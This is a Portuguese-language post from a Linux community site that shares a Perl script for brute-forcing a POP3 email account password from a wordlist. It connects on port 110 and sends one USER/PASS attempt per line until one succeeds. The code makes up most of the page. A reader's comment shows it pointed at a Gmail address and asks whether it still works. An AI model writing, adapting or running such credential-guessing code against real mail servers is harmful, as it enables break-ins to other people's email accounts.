Brutal Force Attack
Publicado por Fábio Berbert de Paula 13/11/2002
[ Hits: 16.411 ]
Homepage: https://fabio.automatizando.dev
Tenta fazer a adivinhação da senha de um usuário de email através da técnica de invasão por força bruta, ou seja, tentativa e erro. O script utiliza o módulo IO::Socket para efetuar conexão com o servidor POP.
#!/usr/bin/perl
#############################################
# brutal.pl
#
# Programa que simula um ataque brutal force
# em servidores de email através da tentativa
# de invasão por adivinhação de senha.
#
# Programado por: Fábio Berbert de Paula
# E-mail: fabio@vivaolinux.com.br
# Web Site: www.vivaolinux.com.br
#
# Rio de Janeiro, 12 de Agosto de 2002
# ##########################################
use strict;
use IO::Socket;
if ($#ARGV != 2) {
print "Use: \n\t$0 popserver username passwd_list\n\nOnde:\n";
print "\tpopserver = servidor de email\n\tusername = nome do usuário\n";
print "\tpasswd_list = arquivo com a lista de senhas que serão enviadas para teste\n\n";
exit(0);
}
my ($server,$user,$pwfile) = @ARGV;
if (! -f $pwfile) {
print "Erro: $pwfile não é um nome de arquivo válido!\n";
exit;
}
# para cada senha, tente invadir
open(R,$pwfile);
while (<R>) {
chomp;
tryout($server,$user,$_);
}
close(R);
sub tryout {
my ($server,$user,$passwd) = @_;
my $state;
print "Tentativa: $passwd ...\n";
my $connex = new IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => "110",
Proto => "tcp",
Type => SOCK_STREAM,
Timeout => "30"
);
if (!defined($connex)) {
print "Erro ao conectar ao servidor $server ...\n";
exit(0);
}
$state = &readsock($connex);
$connex->send("USER $user\r\n");
$state = &readsock($connex);
if ($state !~ /^\+OK/) { next; }
$connex->send("PASS $passwd\r\n");
$state = &readsock($connex);
if ($state =~ /^\+OK/) {
print "Cracked!!! A senha do usuário $user é $passwd\n";
exit;
}
$connex -> close;
sleep(5);
}
sub readsock {
my ($socket) = @_;
my $data = '';
my $buf = '';
while ($buf !~ /\n$/) {
$buf=<$socket>;
$data .= $buf;
}
return $data;
}
Script para encontrar vulnerabilidades no BIND
$ perl brutal.pl smtp.gmail.com fulano@gmail.com list
Erro ao conectar ao servidor smtp.gmail.com ...
Estes script ainda funciona (sei que foi publicado em 2002)?
Patrocínio
Destaques
Artigos
Cirurgia para acelerar o openSUSE em HD externo via USB
Void Server como Domain Control
Modo Simples de Baixar e Usar o bash-completion
Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante
Dicas
Jogar games da Battle.net no Linux com Faugus Launcher
Como fazer a Instalação de aplicativos para acesso remoto ao Linux
Como fazer a instalação do Samba
Como fazer a conversão binária e aplicar as restrições no Linux
Tópicos
Duas Pasta Pessoal Aparecendo no Ubuntu 24.04.3 LTS (21)
Formas seguras de instalar Debian Sid (13)
Malware encontrado em extensões do Firefox. (0)
Fiz uma pergunta no fórum mas não consigo localizar [RESOLVIDO] (21)
Top 10 do mês
-
Xerxes
1° lugar - 149.716 pts -
Fábio Berbert de Paula
2° lugar - 68.685 pts -
Mauricio Ferrari
3° lugar - 21.613 pts -
Buckminster
4° lugar - 21.467 pts -
Alberto Federman Neto.
5° lugar - 20.420 pts -
edps
6° lugar - 19.379 pts -
Daniel Lara Souza
7° lugar - 18.831 pts -
Andre (pinduvoz)
8° lugar - 17.242 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 16.081 pts -
Diego Mendes Rodrigues
10° lugar - 14.438 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
